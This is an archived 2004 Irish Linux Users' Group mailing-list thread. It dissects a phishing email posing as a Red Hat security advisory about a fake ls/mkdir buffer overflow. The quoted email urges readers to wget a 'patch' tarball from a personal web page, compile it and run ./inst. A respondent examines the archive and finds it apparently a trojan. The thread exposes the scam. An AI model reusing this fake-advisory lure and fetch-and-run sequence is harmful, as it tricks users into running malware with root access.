[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"
Chris Higgins
chris.higgins at darach.ie
Sat Oct 23 12:53:33 IST 2004
On Sat, 23 Oct 2004 12:35:44 +0100
Marek <m.mcgann at sussex.ac.uk> wrote:
> Thought you might be interested to see the below - it's the first time
> I've seen anything like this for Linux (apologies for the html mail,
> but that's how it arrived) .
>
> I presume it's this Joeio in Stanford (or whoever) trying to spam his
> way into Red Hat boxes?
>
> Interesting to see someone considering desktop "not-terribly-clued-in"
> Linux users a worthwhile target.
>
> Or am I being too suspicious about it?
Erm... get file, download, untar/gz, extract...
That gets you two files, inst.c and a makefile.
the makefile just compiles the program...
No readme, no nothing...
If the clueless desktop user even did try the
'unpack ; make ; make install ' sequence that is
listed as the 'easy linux way to install software',
it will do nothing - as there is no install target
for the makefile, and the 'inst' target just compiles
the program and does nothing else. I expected it to
at least do a 'cc inst.c -o inst ; ./inst'... but it doesn't
even try that.
So you'd have to be really stupid not have any readme
and still figure out that you had to run 'inst', and not
check what's in the inst.c file in the first place.
First glance of 'inst.c' should get you kinda suspicious
as there is no mention of 'ls' or 'mkdir' anywhere.
As it happens, it starts with "Generic Script Compiler"
copyright Francisco Rosales... no mention of redhat
or anyone else...
I might get the chance to compile and run it later :-)
>
> ---------- Forwarded Message ----------
>
> Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> Date: Saturday 23 October 2004 05:37
> From: RedHat Security Team <security at redhat.com>
> To: <another mailing list I'm subscribed to>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/html4/loose.dtd">
> <html>
> <head>
> <title>Untitled Document</title>
> <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1"><style type="text/css">
> <!--
> .style1 {font-size: 12px}
> - -->
> </style>
> </head>
> <body>
> <p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png"></p>
> <p> Original issue date: October 20, 2004<br>
> Last revised: October 20, 2004<br>
> Source: RedHat </p>
> <p>A complete revision history is at the end of this file. </p>
> <p>Dear RedHat user,</p>
> <p> Redhat found a vulnerability in fileutils (ls and mkdir), that
> could
> allow a remote attacker to execute arbitrary code with root
> privileges. Some of the affected linux distributions include RedHat
> 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
> and not only. It is known that*BSD and Solaris platforms are NOT
> affected.</p> <p>The RedHat Security Team strongly advises you to
> immediately apply the<strong> fileutils-1.0.6 patch</strong>. This is
> a critical-critical update that you must make by following these
> steps:</p> <ul>
> <li>First download the patch from the Stanford RedHat mirror:
> <strong><em>wget
> www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
> <li>Untar the patch:<em><strong> tar zxvf
> fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
> fileutils-1.0.6.patch</strong></em></li>
> <li><em><strong>make</strong></em></li>
> <li><em><strong>./inst</strong></em></li>
> </ul>
> <p>Again, please apply this patch as soon as possible or you risk your
> system
> and others` to be compromised.</p> <p>Thank you for your prompt
> attention to this serious matter,</p>
> <p>RedHat Security Team.</p>
> <p class="style1"> Copyright © 2004 Red Hat, Inc. All rights
> reserved.
> </p> </body>
> </html>
>
> - -------------------------------------------------------
> --
> Irish Linux Users' Group
> http://www.linux.ie/mailman/listinfo/ilug/
>
--
Chris Higgins
Darach Technology Ltd tel: +353-1-6204370
email: chris.higgins at darach.ie fax: +353-1-6204371
http://www.darach.ie
More information about the ILUG
mailing list